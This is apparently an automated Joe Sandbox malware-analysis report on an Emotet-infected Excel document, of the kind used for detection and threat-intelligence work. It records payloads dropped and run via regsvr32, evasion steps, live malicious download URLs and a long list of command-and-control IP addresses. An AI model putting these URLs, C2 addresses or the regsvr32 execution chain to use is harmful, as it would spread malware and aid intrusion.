                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800011AC LoadStringW,LoadStringW,FindResourceA,LoadResource,LockResource,7_2_00000001800011AC
                  Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Bericht 6581.xlsInitial sample: OLE indicators vbamacros = False
                  Source: I7IggNeBzEXeF5[1].dll.0.drStatic PE information: section name: _RDATA
                  Source: soci4.ocx.0.drStatic PE information: section name: _RDATA
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll"
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dllJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\soci4.ocxJump to dropped file
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy)Jump to dropped file
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy)Jump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\soci4.ocxJump to dropped file

                  Boot Survival

                  barindex
                  Drops PE files to the user root directory
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\soci4.ocxJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\regsvr32.exe TID: 1296Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\regsvr32.exe TID: 1780Thread sleep time: -300000s >= -30000sJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dllJump to dropped file
                  Source: C:\Windows\System32\regsvr32.exeAPI coverage: 5.5 %
                  Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00000001800427CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00000001800427CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180042F88 FindFirstFileExW,7_2_0000000180042F88
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180043464 FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_0000000180043464
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214C9F0 FindFirstFileW,FindNextFileW,8_2_0214C9F0
                  Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001360C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000000018001360C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180048198 GetProcessHeap,7_2_0000000180048198
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180002F14 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0000000180002F14
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001360C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000000018001360C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 174.138.33.49 7080Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll"Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,7_2_000000018004C150
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,7_2_000000018004C1D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,7_2_000000018004C2A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_000000018004C364
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,7_2_000000018004C5B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,7_2_0000000180046664
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_000000018004C708
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,7_2_0000000180046788
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,7_2_000000018004C7DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,7_2_0000000180046810
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_000000018004C908
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,7_2_00000001800475F0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180059100 cpuid 7_2_0000000180059100
                  Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800032C0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_00000001800032C0

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Emotet
                  Source: Yara matchFile source: 7.2.regsvr32.exe.1f40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.regsvr32.exe.2020000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.regsvr32.exe.1f40000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.regsvr32.exe.2020000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1764450272.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1494028683.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1494505422.0000000002141000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts2
                  Scripting                  		Path Interception111
                  Process Injection                  		131
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		Exfiltration Over Other Network Medium11
                  Encrypted Channel                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts43
                  Exploitation for Client Execution                  		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                  Disable or Modify Tools                  		LSASS Memory12
                  Security Software Discovery                  		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                  Non-Standard Port                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                  Virtualization/Sandbox Evasion                  		Security Account Manager1
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration14
                  Ingress Tool Transfer                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                  Process Injection                  		NTDS2
                  Process Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer3
                  Non-Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                  Scripting                  		LSA Secrets1
                  Remote System Discovery                  		SSHKeyloggingData Transfer Size Limits124
                  Application Layer Protocol                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  Hidden Files and Directories                  		Cached Domain Credentials2
                  File and Directory Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Regsvr32                  		DCSync35
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 667161 Sample: Bericht 6581.xls Startdate: 17/07/2022 Architecture: WINDOWS Score: 100 39 103.224.241.74 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 2->39 41 202.29.239.162 UNINET-AS-APUNINET-TH Thailand 2->41 43 44 other IPs or domains 2->43 55 Snort IDS alert for network traffic 2->55 57 Multi AV Scanner detection for domain / URL 2->57 59 Antivirus detection for URL or domain 2->59 61 11 other signatures 2->61 8 EXCEL.EXE 9 24 2->8         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 45 atperson.com 51.38.169.114, 443, 49171 OVHFR France 8->45 47 domesticuif.co.za 196.22.142.203, 49176, 80 xneeloZA South Africa 8->47 49 2 other IPs or domains 8->49 29 C:\Users\user\soci4.ocx, PE32+ 8->29 dropped 31 C:\Users\user\...\I7IggNeBzEXeF5[1].dll, PE32+ 8->31 dropped 33 C:\Users\user\Desktop\Bericht 6581.xls, Composite 8->33 dropped 35 C:\Users\user\...\8WkzZvRZPr2gVDdMW[1].dll, data 8->35 dropped 63 Document exploit detected (creates forbidden files) 8->63 65 Document exploit detected (UrlDownloadToFile) 8->65 15 regsvr32.exe 2 8->15         started        19 regsvr32.exe 8->19         started        21 regsvr32.exe 8->21         started        23 regsvr32.exe 8->23         started        file6 signatures7 process8 file9 37 C:\Windows\...\gUYUkALTAiOgx.dll (copy), PE32+ 15->37 dropped 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->53 25 regsvr32.exe 2 15->25         started        signatures10 process11 dnsIp12 51 174.138.33.49, 49177, 7080 DIGITALOCEAN-ASNUS United States 25->51 67 System process connects to network (likely due to code injection or exploit) 25->67 signatures13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Bericht 6581.xls34%MetadefenderBrowse
                  Bericht 6581.xls46%ReversingLabsDocument-Word.Trojan.Abracadabra

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll54%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll88%ReversingLabsWin64.Trojan.Emotet
                  C:\Users\user\soci4.ocx54%MetadefenderBrowse
                  C:\Users\user\soci4.ocx88%ReversingLabsWin64.Trojan.Emotet
                  C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy)54%MetadefenderBrowse
                  C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy)88%ReversingLabsWin64.Trojan.Emotet

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  atperson.com13%VirustotalBrowse
                  atici.net14%VirustotalBrowse
                  eliteturismo.com11%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://atperson.com/campusvirtual/EOgFGo17w/100%Avira URL Cloudmalware
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  https://174.138.33.49:7080/$100%Avira URL Cloudmalware
                  https://js.cofounderspecials.com/splash.js?v=1.1.1100%Avira URL Cloudmalware
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://174.138.33.49:7080/(100%Avira URL Cloudmalware
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://atici.net/c/JDFDBMIz/100%Avira URL Cloudmalware
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  https://174.138.33.49/0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  domesticuif.co.za
                  		196.22.142.203
                  		truefalse
                    		high
                    atperson.com
                    		51.38.169.114
                    		truetrueunknown
                    atici.net
                    		185.15.196.157
                    		truefalseunknown
                    eliteturismo.com
                    		44.194.33.146
                    		truefalseunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://atperson.com/campusvirtual/EOgFGo17w/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://domesticuif.co.za/libraries/nbnH9dpd/false
                      		high
                      http://atici.net/c/JDFDBMIz/true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.entrust.net/server1.crl0regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://174.138.33.49:7080/$regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://js.cofounderspecials.com/splash.js?v=1.1.18WkzZvRZPr2gVDdMW[1].dll.0.dr, soci3.ocx.0.drtrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://ocsp.entrust.net03regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://174.138.33.49:7080/(regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.entrust.net0Dregsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://secure.comodo.com/CPS0regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://174.138.33.49/regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            157.230.99.206
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue
                            188.165.79.151
                            		unknownFrance
                            		16276OVHFRtrue
                            196.44.98.190
                            		unknownGhana
                            		327814EcobandGHtrue
                            174.138.33.49
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue
                            43.129.209.178
                            		unknownJapan4249LILLY-ASUStrue
                            103.41.204.169
                            		unknownIndonesia
                            		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                            36.67.23.59
                            		unknownIndonesia
                            		17974TELKOMNET-AS2-APPTTelekomunikasiIndonesiaIDtrue
                            5.253.30.17
                            		unknownLatvia
                            		18978ENZUINC-UStrue
                            85.214.67.203
                            		unknownGermany
                            		6724STRATOSTRATOAGDEtrue
                            83.229.80.93
                            		unknownUnited Kingdom
                            		8513SKYVISIONGBtrue
                            198.199.70.22
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue
                            93.104.209.107
                            		unknownGermany
                            		8767MNET-ASGermanyDEtrue
                            188.225.32.231
                            		unknownRussian Federation
                            		9123TIMEWEB-ASRUtrue
                            175.126.176.79
                            		unknownKorea Republic of
                            		9523MOKWON-AS-KRMokwonUniversityKRtrue
                            128.199.242.164
                            		unknownUnited Kingdom
                            		14061DIGITALOCEAN-ASNUStrue
                            104.248.225.227
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue
                            178.238.225.252
                            		unknownGermany
                            		51167CONTABODEtrue
                            190.145.8.4
                            		unknownColombia
                            		14080TelmexColombiaSACOtrue
                            46.101.98.60
                            		unknownNetherlands
                            		14061DIGITALOCEAN-ASNUStrue
                            44.194.33.146
                            		eliteturismo.comUnited States
                            		14618AMAZON-AESUSfalse
                            103.71.99.57
                            		unknownIndia
                            		135682AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdINtrue
                            87.106.97.83
                            		unknownGermany
                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                            103.85.95.4
                            		unknownIndonesia
                            		136077IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramIDtrue
                            202.134.4.210
                            		unknownIndonesia
                            		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                            88.217.172.165
                            		unknownGermany
                            		8767MNET-ASGermanyDEtrue
                            165.22.254.236
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue
                            118.98.72.86
                            		unknownIndonesia
                            		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                            139.59.80.108
                            		unknownSingapore
                            		14061DIGITALOCEAN-ASNUStrue
                            37.44.244.177
                            		unknownGermany
                            		47583AS-HOSTINGERLTtrue
                            104.244.79.94
                            		unknownUnited States
                            		53667PONYNETUStrue
                            157.245.111.0
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue
                            54.37.106.167
                            		unknownFrance
                            		16276OVHFRtrue
                            202.29.239.162
                            		unknownThailand
                            		4621UNINET-AS-APUNINET-THtrue
                            103.56.149.105
                            		unknownIndonesia
                            		55688BEON-AS-IDPTBeonIntermediaIDtrue
                            85.25.120.45
                            		unknownGermany
                            		8972GD-EMEA-DC-SXB1DEtrue
                            37.187.114.15
                            		unknownFrance
                            		16276OVHFRtrue
                            51.38.169.114
                            		atperson.comFrance
                            		16276OVHFRtrue
                            139.196.72.155
                            		unknownChina
                            		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                            165.232.185.110
                            		unknownUnited States
                            		22255ALLEGHENYHEALTHNETWORKUStrue
                            128.199.217.206
                            		unknownUnited Kingdom
                            		14061DIGITALOCEAN-ASNUStrue
                            196.22.142.203
                            		domesticuif.co.zaSouth Africa
                            		37153xneeloZAfalse
                            103.224.241.74
                            		unknownIndia
                            		133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue
                            210.57.209.142
                            		unknownIndonesia
                            		38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                            190.107.19.179
                            		unknownColombia
                            		27951MediaCommercePartnersSACOtrue
                            202.28.34.99
                            		unknownThailand
                            		9562MSU-TH-APMahasarakhamUniversityTHtrue
                            54.37.228.122
                            		unknownFrance
                            		16276OVHFRtrue
                            195.77.239.39
                            		unknownSpain
                            		60493FICOSA-ASEStrue
                            185.15.196.157
                            		atici.netTurkey
                            		201520DEDICATEDTELECOMTRfalse
                            178.62.112.199
                            		unknownEuropean Union
                            		14061DIGITALOCEAN-ASNUStrue
                            62.171.178.147
                            		unknownUnited Kingdom
                            		51167CONTABODEtrue
                            64.227.55.231
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue

                            General Information

                            Joe Sandbox Version:35.0.0 Citrine
                            Analysis ID:667161
                            Start date and time: 17/07/202213:08:132022-07-17 13:08:13 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 12m 23s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:Bericht 6581.xls
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:11
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winXLS@12/11@4/51
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 100% (good quality ratio 80.6%)
                            • Quality average: 64.8%
                            • Quality standard deviation: 39.3%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 22
                            • Number of non-executed functions: 148
                            Cookbook Comments:
                            • Found application associated with file extension: .xls
                            • Adjust boot time
                            • Enable AMSI
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded IPs from analysis (whitelisted): 209.197.3.8, 8.253.207.120, 8.248.115.254, 8.238.189.126, 8.248.143.254, 8.248.117.254
                            • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            13:13:42API Interceptor446x Sleep call for process: svchost.exe modified
                            13:13:52API Interceptor541x Sleep call for process: regsvr32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            157.230.99.206PYCkUgesWB.dllGet hashmaliciousBrowse
                              nz032vqLOi.dllGet hashmaliciousBrowse
                                nz032vqLOi.dllGet hashmaliciousBrowse
                                  azKC4bycQq.dllGet hashmaliciousBrowse
                                    HUrHMu39FU.dllGet hashmaliciousBrowse
                                      HUrHMu39FU.dllGet hashmaliciousBrowse
                                        5Fa665mRHe.dllGet hashmaliciousBrowse
                                          5Fa665mRHe.dllGet hashmaliciousBrowse
                                            8QfaZFMbEb.dllGet hashmaliciousBrowse
                                              P22l0y2mfd.dllGet hashmaliciousBrowse
                                                xWvN5HkNDU.dllGet hashmaliciousBrowse
                                                  P22l0y2mfd.dllGet hashmaliciousBrowse
                                                    ik1z1nXXuU.dllGet hashmaliciousBrowse
                                                      td722u34As.dllGet hashmaliciousBrowse
                                                        MZ5g6cEEr6.dllGet hashmaliciousBrowse
                                                          2vMjDd8z34.dllGet hashmaliciousBrowse
                                                            R78g1mgKDg.dllGet hashmaliciousBrowse
                                                              MZ5g6cEEr6.dllGet hashmaliciousBrowse
                                                                JdRnXj2wcy.dllGet hashmaliciousBrowse
                                                                  R78g1mgKDg.dllGet hashmaliciousBrowse
                                                                    188.165.79.151nz032vqLOi.dllGet hashmaliciousBrowse
                                                                      azKC4bycQq.dllGet hashmaliciousBrowse
                                                                        bLJR1tSMfo.dllGet hashmaliciousBrowse
                                                                          HUrHMu39FU.dllGet hashmaliciousBrowse
                                                                            HUrHMu39FU.dllGet hashmaliciousBrowse
                                                                              5Fa665mRHe.dllGet hashmaliciousBrowse
                                                                                5Fa665mRHe.dllGet hashmaliciousBrowse
                                                                                  8QfaZFMbEb.dllGet hashmaliciousBrowse
                                                                                    P22l0y2mfd.dllGet hashmaliciousBrowse
                                                                                      ik1z1nXXuU.dllGet hashmaliciousBrowse
                                                                                        xWvN5HkNDU.dllGet hashmaliciousBrowse
                                                                                          bOc8U9QEOx.dllGet hashmaliciousBrowse
                                                                                            8QfaZFMbEb.dllGet hashmaliciousBrowse
